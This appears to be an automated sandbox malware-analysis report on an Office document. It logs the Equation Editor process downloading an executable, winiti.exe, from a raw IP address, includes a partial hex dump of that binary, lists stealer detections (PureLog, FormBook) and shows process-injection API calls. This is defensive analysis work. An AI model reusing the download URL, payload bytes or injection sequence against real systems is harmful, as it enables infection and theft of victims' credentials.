                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SmVL%2B9Ij5x9y%2F3Ryt%2F%2B8wVe%2FJf89vur2PUoFzBwq%2BhKVE%2B971DuKKd4%2FAxAMf90de2Dc1s4PpEY6I6cjg4CVj4STv%2FMod5sQvbO0gthym9fJa8SonoCMJVYp"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a933cf9f96f43aa-EWR
                alt-svc: h3=":443"; ma=86400
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0
                Jul 26, 2024 11:07:15.037506104 CEST129OUTOPTIONS / HTTP/1.1
                User-Agent: Microsoft Office Protocol Discovery
                Host: tny.wtf
                Content-Length: 0
                Connection: Keep-Alive
                Jul 26, 2024 11:07:15.185597897 CEST568INHTTP/1.1 404 Not Found
                Date: Fri, 26 Jul 2024 09:07:15 GMT
                Transfer-Encoding: chunked
                Connection: keep-alive
                X-Powered-By: ASP.NET
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B%2B%2BpXjTQyBLo%2Bvl14dRKuLT%2Btdqr9KVmq5wbTz3TUPpgSwvrNve5b4kGa%2FHasnFjyhtElKH6%2FVCoWBFZoU332quVLf0D07BbNKXhaxTL3RUzsDaXeT1Ket6X"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a933d034ebc43aa-EWR
                alt-svc: h3=":443"; ma=86400
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0
                Jul 26, 2024 11:07:15.193888903 CEST129OUTOPTIONS / HTTP/1.1
                User-Agent: Microsoft Office Protocol Discovery
                Host: tny.wtf
                Content-Length: 0
                Connection: Keep-Alive
                Jul 26, 2024 11:07:15.342475891 CEST562INHTTP/1.1 404 Not Found
                Date: Fri, 26 Jul 2024 09:07:15 GMT
                Transfer-Encoding: chunked
                Connection: keep-alive
                X-Powered-By: ASP.NET
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BP%2FoNZFsu5NoJ2VHc8FLC37%2FXnlTwEwtM0nXnI%2F7U40Kzm4UI5cYplLfaeHiXSnnXM8BCCIaM2ls6YL1f4sfEySGyCjl64RzWajeO7SNy%2BZEIbDF8CoOgWXL"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a933d044f4843aa-EWR
                alt-svc: h3=":443"; ma=86400
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0
                Jul 26, 2024 11:07:20.041960955 CEST130OUTHEAD /dGa HTTP/1.1
                User-Agent: Microsoft Office Existence Discovery
                Host: tny.wtf
                Content-Length: 0
                Connection: Keep-Alive
                Jul 26, 2024 11:07:20.191328049 CEST560INHTTP/1.1 405 Method Not Allowed
                Date: Fri, 26 Jul 2024 09:07:20 GMT
                Connection: keep-alive
                Allow: GET
                X-Powered-By: ASP.NET
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ghmxKnBclIsuaFsO%2BAgZe1UVdTmTSN7tCdd%2By14%2BoNFbOz%2F%2BqIatQWipEJ5X7pv0aGOwCred6l6Qn%2B5hn7cuXXYixXiIB%2Bovgwvk6%2FmiAq%2FkzCtafAUhKo9v"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a933d2299c943aa-EWR
                alt-svc: h3=":443"; ma=86400


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                3192.168.2.2249164188.114.97.380652C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                TimestampBytes transferredDirectionData
                Jul 26, 2024 11:07:15.424078941 CEST111OUTHEAD /dGa HTTP/1.1
                Connection: Keep-Alive
                User-Agent: Microsoft Office Existence Discovery
                Host: tny.wtf
                Jul 26, 2024 11:07:15.987751007 CEST556INHTTP/1.1 405 Method Not Allowed
                Date: Fri, 26 Jul 2024 09:07:15 GMT
                Connection: keep-alive
                Allow: GET
                X-Powered-By: ASP.NET
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GxgDkRYL5uLcVQCKLfuf6%2F6C470NCH6hAnq2%2FvW4UD246J1oGlxNz%2Fzyk%2Fx2M%2BCufy8MJxIJc5dhanc2sqUbprZeMyDVjCgDPzvTxLVMgrP%2BfkfIKlcg9Wg%2B"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a933d080c3843dc-EWR
                alt-svc: h3=":443"; ma=86400
                Jul 26, 2024 11:07:16.199393988 CEST556INHTTP/1.1 405 Method Not Allowed
                Date: Fri, 26 Jul 2024 09:07:15 GMT
                Connection: keep-alive
                Allow: GET
                X-Powered-By: ASP.NET
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GxgDkRYL5uLcVQCKLfuf6%2F6C470NCH6hAnq2%2FvW4UD246J1oGlxNz%2Fzyk%2Fx2M%2BCufy8MJxIJc5dhanc2sqUbprZeMyDVjCgDPzvTxLVMgrP%2BfkfIKlcg9Wg%2B"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a933d080c3843dc-EWR
                alt-svc: h3=":443"; ma=86400


                Session IDSource IPSource PortDestination IPDestination Port
                4192.168.2.2249165188.114.96.380
                TimestampBytes transferredDirectionData
                Jul 26, 2024 11:07:19.250947952 CEST124OUTOPTIONS / HTTP/1.1
                Connection: Keep-Alive
                User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                translate: f
                Host: tny.wtf
                Jul 26, 2024 11:07:19.844818115 CEST562INHTTP/1.1 404 Not Found
                Date: Fri, 26 Jul 2024 09:07:19 GMT
                Transfer-Encoding: chunked
                Connection: keep-alive
                X-Powered-By: ASP.NET
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ASSs5oNO7KlkDaxt8lzsY7zELo7mEgZGYmKo1tZooPCsbG9KH7DT4ibwma6%2BzSACTQVswG%2BTcw9iyHWbQj9K28AICJ32Y8M%2FwHf70oS%2F25VESXW4lVWqlCNX"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a933d201c5a4338-EWR
                alt-svc: h3=":443"; ma=86400
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0
                Jul 26, 2024 11:07:20.059133053 CEST562INHTTP/1.1 404 Not Found
                Date: Fri, 26 Jul 2024 09:07:19 GMT
                Transfer-Encoding: chunked
                Connection: keep-alive
                X-Powered-By: ASP.NET
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ASSs5oNO7KlkDaxt8lzsY7zELo7mEgZGYmKo1tZooPCsbG9KH7DT4ibwma6%2BzSACTQVswG%2BTcw9iyHWbQj9K28AICJ32Y8M%2FwHf70oS%2F25VESXW4lVWqlCNX"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a933d201c5a4338-EWR
                alt-svc: h3=":443"; ma=86400
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                5192.168.2.2249166104.219.239.104803044C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                TimestampBytes transferredDirectionData
                Jul 26, 2024 11:07:20.673326015 CEST315OUTGET /80/winiti.exe HTTP/1.1
                Accept: */*
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 104.219.239.104
                Connection: Keep-Alive
                Jul 26, 2024 11:07:21.237102032 CEST1236INHTTP/1.1 200 OK
                Date: Fri, 26 Jul 2024 09:07:21 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                Last-Modified: Tue, 16 Jul 2024 19:13:36 GMT
                ETag: "e8400-61d6224798859"
                Accept-Ranges: bytes
                Content-Length: 951296
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: application/x-msdownload
                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 60 c6 96 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 78 0e 00 00 0a 00 00 00 00 00 00 1e 96 0e 00 00 20 00 00 00 a0 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c9 95 0e 00 4f 00 00 00 00 a0 0e 00 18 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0e 00 0c 00 00 00 28 6d 0e 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL`f0x @ @O(mT H.text$v x `.rsrcz@@.reloc@BHLUIPZ}rp}}((*}rp}}((}*0rpsorpssso&oo}{{oo( &o!*_b tw0{rpo"{rpo"{
                Jul 26, 2024 11:07:21.237231016 CEST1236INData Raw: 00 04 72 01 00 00 70 6f 22 00 00 0a 00 02 7b 1d 00 00 04 02 7b 1e 00 00 04 16 25 0a 6f 23 00 00 0a 00 06 6f 23 00 00 0a 00 02 7b 12 00 00 04 72 01 00 00 70 6f 22 00 00 0a 00 02 7b 11 00 00 04 72 01 00 00 70 6f 22 00 00 0a 00 02 7b 17 00 00 04 72
                Data Ascii: rpo"{{%o#o#{rpo"{rpo"{rpo"{rpo"{"{!%o#o#{rpo"*&(*0k{'o${o${o${o${o$
                Jul 26, 2024 11:07:21.237276077 CEST1236INData Raw: 27 00 00 04 16 6f 24 00 00 0a 00 02 7b 06 00 00 04 17 6f 24 00 00 0a 00 02 7b 14 00 00 04 17 6f 24 00 00 0a 00 02 7b 13 00 00 04 17 6f 24 00 00 0a 00 02 7b 15 00 00 04 17 6f 24 00 00 0a 00 02 7b 28 00 00 04 16 6f 24 00 00 0a 00 02 7b 2a 00 00 04
                Data Ascii: 'o${o${o${o${o${(o${*o$*0{o%rp(09{o%rp(09{o%rp(09{o1-{o19{o%rp(0,v{o
                Jul 26, 2024 11:07:21.237312078 CEST1236INData Raw: 20 00 00 0a 26 00 de 00 2a 01 10 00 00 00 00 01 00 39 3a 00 11 20 00 00 01 13 30 02 00 2b 00 00 00 02 00 00 11 00 03 2c 0b 02 7b 05 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 05 00 00 04 6f 36 00 00 0a 00 00 02 03 28 37 00 00 0a 00 2a 00 13
                Data Ascii: &*9: 0+,{+,{o6(7*0(8s9s:}s;}s<}s<}s;}s<}s;}s<}s;}s<}s<}s;}
                Jul 26, 2024 11:07:21.237345934 CEST1236INData Raw: 6f 53 00 00 0a 00 02 7b 09 00 00 04 1a 6f 54 00 00 0a 00 02 7b 09 00 00 04 72 43 06 00 70 6f 22 00 00 0a 00 02 7b 0a 00 00 04 72 d9 05 00 70 22 00 00 90 41 18 19 16 73 57 00 00 0a 6f 58 00 00 0a 00 02 7b 0a 00 00 04 18 1f 29 73 48 00 00 0a 6f 49
                Data Ascii: oS{oT{rCpo"{rp"AsWoX{)sHoI{sJoK{r[poL{ T#sRoS{oT{oY{rp"AsZoX{ sHoI{sJoK
                Jul 26, 2024 11:07:21.237380981 CEST1236INData Raw: 00 0a 00 02 7b 12 00 00 04 1e 6f 5e 00 00 0a 00 02 7b 12 00 00 04 18 20 9b 00 00 00 73 48 00 00 0a 6f 49 00 00 0a 00 02 7b 12 00 00 04 18 18 18 18 73 4a 00 00 0a 6f 4b 00 00 0a 00 02 7b 12 00 00 04 72 3f 07 00 70 6f 4c 00 00 0a 00 02 7b 12 00 00
                Data Ascii: {o^{ sHoI{sJoK{r?poL{ T#sRoS{oT{ s_o`{rp"AsZoX{ 5 sHoI{sJoK{rMpoL{
                Jul 26, 2024 11:07:21.237416983 CEST776INData Raw: 70 6f 4c 00 00 0a 00 02 7b 19 00 00 04 20 54 01 00 00 1f 43 73 52 00 00 0a 6f 53 00 00 0a 00 02 7b 19 00 00 04 1f 13 6f 54 00 00 0a 00 02 7b 1a 00 00 04 17 6f 59 00 00 0a 00 02 7b 1a 00 00 04 72 d9 05 00 70 22 00 00 90 41 17 73 5a 00 00 0a 6f 58
                Data Ascii: poL{ TCsRoS{oT{oY{rp"AsZoX{ sHoI{sJoK{r/poL{]sRoS{oT{r=po"{oY{rp"AsZoX{
                Jul 26, 2024 11:07:21.237848997 CEST1236INData Raw: 73 52 00 00 0a 6f 53 00 00 0a 00 02 7b 1e 00 00 04 1f 1a 6f 54 00 00 0a 00 02 7b 1e 00 00 04 17 6f 64 00 00 0a 00 02 7b 1e 00 00 04 72 3a 02 00 70 6f 22 00 00 0a 00 02 7b 1e 00 00 04 17 6f 61 00 00 0a 00 02 7b 1f 00 00 04 6f 65 00 00 0a 02 7b 1e
                Data Ascii: sRoS{oT{od{r:po"{oa{oe{of{oe{of{rp"AsWoX{usHoI{sJoK{rpoL{ S!sRoS{oT{
                Jul 26, 2024 11:07:21.237883091 CEST1236INData Raw: 5a 00 00 0a 6f 58 00 00 0a 00 02 7b 26 00 00 04 1f 09 20 88 00 00 00 73 48 00 00 0a 6f 49 00 00 0a 00 02 7b 26 00 00 04 18 16 18 16 73 4a 00 00 0a 6f 4b 00 00 0a 00 02 7b 26 00 00 04 72 37 09 00 70 6f 4c 00 00 0a 00 02 7b 26 00 00 04 20 e3 00 00
                Data Ascii: ZoX{& sHoI{&sJoK{&r7poL{& sRoS{& oT{&rGpo"{'oe{of{'oe{of{'oe{of{'oe{of{'oe{ of
                Jul 26, 2024 11:07:21.237920046 CEST1236INData Raw: 28 65 00 00 0a 02 7b 1b 00 00 04 6f 66 00 00 0a 00 02 28 65 00 00 0a 02 7b 1a 00 00 04 6f 66 00 00 0a 00 02 28 65 00 00 0a 02 7b 18 00 00 04 6f 66 00 00 0a 00 02 28 65 00 00 0a 02 7b 16 00 00 04 6f 66 00 00 0a 00 02 28 65 00 00 0a 02 7b 15 00 00
                Data Ascii: (e{of(e{of(e{of(e{of(e{of(e{of(e{of(e{of(e{of(e{of(e{of(e{of(e{of(e{
                Jul 26, 2024 11:07:21.242577076 CEST1236INData Raw: 0a 00 2a 00 00 1b 30 03 00 4c 00 00 00 06 00 00 11 00 00 02 7b 2b 00 00 04 6f 33 00 00 0a 0a 06 72 ce 0a 00 70 02 7b 2f 00 00 04 6f 25 00 00 0a 28 34 00 00 0a 6f 35 00 00 0a 00 02 7b 2e 00 00 04 06 6f 1e 00 00 0a 00 00 de 11 0b 00 07 6f 1f 00 00
                Data Ascii: *0L{+o3rp{/o%(4o5{.oo( &*9: 0{,{.oY,g{,{.oY,<{.{.o~{,X},oo+o,o+r0


                Session IDSource IPSource PortDestination IPDestination Port
                6192.168.2.2249167188.114.97.380
                TimestampBytes transferredDirectionData
                Jul 26, 2024 11:08:21.390809059 CEST124OUTOPTIONS / HTTP/1.1
                Connection: Keep-Alive
                User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                translate: f
                Host: tny.wtf
                Jul 26, 2024 11:08:21.973901987 CEST560INHTTP/1.1 404 Not Found
                Date: Fri, 26 Jul 2024 09:08:21 GMT
                Transfer-Encoding: chunked
                Connection: keep-alive
                X-Powered-By: ASP.NET
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TsjIlU1hx5fa%2BVMyLkPmD6JFcksZgmIHlWwiGUYIs%2FZUQP%2BkwJ3xsm5LWw0yy6tSKpvOkPzMYHnFNgNoG1NFA1JvqtFlPjChQdh46WuXq1bK7G5jGWZm2Qbk"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a933ea469e580d0-EWR
                alt-svc: h3=":443"; ma=86400
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0
                Jul 26, 2024 11:08:22.385812998 CEST560INHTTP/1.1 404 Not Found
                Date: Fri, 26 Jul 2024 09:08:21 GMT
                Transfer-Encoding: chunked
                Connection: keep-alive
                X-Powered-By: ASP.NET
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TsjIlU1hx5fa%2BVMyLkPmD6JFcksZgmIHlWwiGUYIs%2FZUQP%2BkwJ3xsm5LWw0yy6tSKpvOkPzMYHnFNgNoG1NFA1JvqtFlPjChQdh46WuXq1bK7G5jGWZm2Qbk"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a933ea469e580d0-EWR
                alt-svc: h3=":443"; ma=86400
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:05:06:49
                Start date:26/07/2024
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                Imagebase:0x13f530000
                File size:28'253'536 bytes
                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                General

                Target ID:4
                Start time:05:07:11
                Start date:26/07/2024
                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                Imagebase:0x13f590000
                File size:1'423'704 bytes
                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                General

                Target ID:8
                Start time:05:07:19
                Start date:26/07/2024
                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                Wow64 process (32bit):true
                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Imagebase:0x400000
                File size:543'304 bytes
                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:9
                Start time:05:07:21
                Start date:26/07/2024
                Path:C:\Users\user\AppData\Roaming\winiti.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\AppData\Roaming\winiti.exe"
                Imagebase:0x11d0000
                File size:951'296 bytes
                MD5 hash:1F5C95D40C06C01300F0A6592945A72D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.443827967.0000000000680000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.444323553.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 100%, Joe Sandbox ML
                • Detection: 48%, Virustotal, Browse
                Reputation:low
                Has exited:true

                General

                Target ID:10
                Start time:05:07:22
                Start date:26/07/2024
                Path:C:\Users\user\AppData\Roaming\winiti.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\AppData\Roaming\winiti.exe"
                Imagebase:0x11d0000
                File size:951'296 bytes
                MD5 hash:1F5C95D40C06C01300F0A6592945A72D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.530344270.00000000002D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.530344270.00000000002D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.530386931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.530386931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                Reputation:low
                Has exited:true

                Disassembly

                Code Analysis

                Call Graph

                • Entrypoint
                • Decryption Function
                • Executed
                • Not Executed
                • Show Help
                callgraph 1 Error: Graph is empty

                Module: Sheet1

                Declaration
                LineContent
                1

                Attribute VB_Name = "Sheet1"

                2

                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                3

                Attribute VB_GlobalNameSpace = False

                4

                Attribute VB_Creatable = False

                5

                Attribute VB_PredeclaredId = True

                6

                Attribute VB_Exposed = True

                7

                Attribute VB_TemplateDerived = False

                8

                Attribute VB_Customizable = True

                Module: Sheet2

                Declaration
                LineContent
                1

                Attribute VB_Name = "Sheet2"

                2

                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                3

                Attribute VB_GlobalNameSpace = False

                4

                Attribute VB_Creatable = False

                5

                Attribute VB_PredeclaredId = True

                6

                Attribute VB_Exposed = True

                7

                Attribute VB_TemplateDerived = False

                8

                Attribute VB_Customizable = True

                Module: Sheet3

                Declaration
                LineContent
                1

                Attribute VB_Name = "Sheet3"

                2

                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                3

                Attribute VB_GlobalNameSpace = False

                4

                Attribute VB_Creatable = False

                5

                Attribute VB_PredeclaredId = True

                6

                Attribute VB_Exposed = True

                7

                Attribute VB_TemplateDerived = False

                8

                Attribute VB_Customizable = True

                Module: ThisWorkbook

                Declaration
                LineContent
                1

                Attribute VB_Name = "ThisWorkbook"

                2

                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                3

                Attribute VB_GlobalNameSpace = False

                4

                Attribute VB_Creatable = False

                5

                Attribute VB_PredeclaredId = True

                6

                Attribute VB_Exposed = True

                7

                Attribute VB_TemplateDerived = False

                8

                Attribute VB_Customizable = True

                Reset < >

                  Non-executed Functions

                  Function 00308354 Relevance: 1.5, Strings: 1, Instructions: 206COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000008.00000002.441287164.00000000002FE000.00000004.00000020.00020000.00000000.sdmp, Offset: 002FE000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_2fe000_EQNEDT32.jbxd
                  Similarity
                  • API ID:
                  • String ID: X~.
                  • API String ID: 0-4035248045
                  • Opcode ID: 3361dcfc4941948b3e5d2305e300317d44450602db20da6ac1b493caa06de31d
                  • Instruction ID: 1ae4cd60ce08726981e16945b53439cb458e6442c40d6c8178fd95df63ea6464
                  • Opcode Fuzzy Hash: 3361dcfc4941948b3e5d2305e300317d44450602db20da6ac1b493caa06de31d
                  • Instruction Fuzzy Hash: B861036954E7C29FD3138B34583A291BFB0AE53624B4E46DBC8C0CF4F7E659484AC362
                  Function 0030EB5C Relevance: .2, Instructions: 178COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000008.00000002.441287164.00000000002FE000.00000004.00000020.00020000.00000000.sdmp, Offset: 002FE000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_2fe000_EQNEDT32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1d5c02e0b80ce451ee1950f37bd6c44c4b5bb16afcc884ee7eecc2ac02018157
                  • Instruction ID: aa14a1d0f2dd86f305a61cba124075a8e23e6ed1d2e79764ec66fede0b94e4d2
                  • Opcode Fuzzy Hash: 1d5c02e0b80ce451ee1950f37bd6c44c4b5bb16afcc884ee7eecc2ac02018157
                  • Instruction Fuzzy Hash: AF212D5A27E3E05BCF678F3588F91A2BF649D1320430D59DEC8D18E4A3C1858A25DB67
                  Function 0030811C Relevance: .1, Instructions: 146COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000008.00000002.441287164.00000000002FE000.00000004.00000020.00020000.00000000.sdmp, Offset: 002FE000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_2fe000_EQNEDT32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a54af84634dbed51b909d033a1be8d6cbb76217bfddacdd594273b6f470d1892
                  • Instruction ID: e0fcd18db456dd869e14d457e3d75188d594978f45ff0791fdad46264e53da1b
                  • Opcode Fuzzy Hash: a54af84634dbed51b909d033a1be8d6cbb76217bfddacdd594273b6f470d1892
                  • Instruction Fuzzy Hash: 0241AD6145E7C18FD3078B71887A681BF70BE5322071E85CFC4C19F5E3E62A494AD756

                  Execution Graph

                  Execution Coverage:16.3%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:0%
                  Total number of Nodes:114
                  Total number of Limit Nodes:0
                  execution_graph 7349 724068 7350 724072 7349->7350 7351 7240ca 7349->7351 7353 724988 7350->7353 7354 7249a2 7353->7354 7372 72545f 7354->7372 7377 724f7e 7354->7377 7382 725157 7354->7382 7387 725310 7354->7387 7392 7251b2 7354->7392 7397 7255ad 7354->7397 7401 7254ef 7354->7401 7405 72524f 7354->7405 7410 72534b 7354->7410 7414 72518a 7354->7414 7419 7251c4 7354->7419 7424 725121 7354->7424 7429 724ee0 7354->7429 7434 724f1d 7354->7434 7441 724ebc 7354->7441 7446 724e5c 7354->7446 7355 7249c6 7355->7351 7373 725465 7372->7373 7454 723748 7373->7454 7458 723750 7373->7458 7374 725631 7378 724fa1 7377->7378 7380 723750 WriteProcessMemory 7378->7380 7381 723748 WriteProcessMemory 7378->7381 7379 7253d7 7380->7379 7381->7379 7383 724ec8 7382->7383 7383->7355 7462 7238b0 7383->7462 7466 7238ab 7383->7466 7384 72551a 7384->7355 7388 724ec8 7387->7388 7388->7355 7390 7238b0 ReadProcessMemory 7388->7390 7391 7238ab ReadProcessMemory 7388->7391 7389 72551a 7389->7355 7390->7389 7391->7389 7393 7251b6 7392->7393 7395 7238b0 ReadProcessMemory 7393->7395 7396 7238ab ReadProcessMemory 7393->7396 7394 72551a 7394->7355 7395->7394 7396->7394 7398 7256a5 7397->7398 7399 723750 WriteProcessMemory 7398->7399 7400 723748 WriteProcessMemory 7398->7400 7399->7398 7400->7398 7402 72551a 7401->7402 7403 7238b0 ReadProcessMemory 7401->7403 7404 7238ab ReadProcessMemory 7401->7404 7402->7355 7403->7402 7404->7402 7406 724ec8 7405->7406 7406->7355 7408 7238b0 ReadProcessMemory 7406->7408 7409 7238ab ReadProcessMemory 7406->7409 7407 72551a 7407->7355 7408->7407 7409->7407 7470 7234f6 7410->7470 7474 7234f8 7410->7474 7411 725365 7415 724ec8 7414->7415 7415->7355 7417 7238b0 ReadProcessMemory 7415->7417 7418 7238ab ReadProcessMemory 7415->7418 7416 72551a 7416->7355 7417->7416 7418->7416 7420 7251de 7419->7420 7478 723406 7420->7478 7482 723408 7420->7482 7421 7251f3 7425 72512f 7424->7425 7427 723406 ResumeThread 7425->7427 7428 723408 ResumeThread 7425->7428 7426 7251f3 7426->7426 7427->7426 7428->7426 7430 724ec8 7429->7430 7430->7355 7432 7238b0 ReadProcessMemory 7430->7432 7433 7238ab ReadProcessMemory 7430->7433 7431 72551a 7431->7355 7432->7431 7433->7431 7486 723623 7434->7486 7490 723628 7434->7490 7435 724ec8 7435->7355 7439 7238b0 ReadProcessMemory 7435->7439 7440 7238ab ReadProcessMemory 7435->7440 7436 72551a 7436->7355 7439->7436 7440->7436 7443 724ec8 7441->7443 7442 72551a 7442->7355 7443->7355 7444 7238b0 ReadProcessMemory 7443->7444 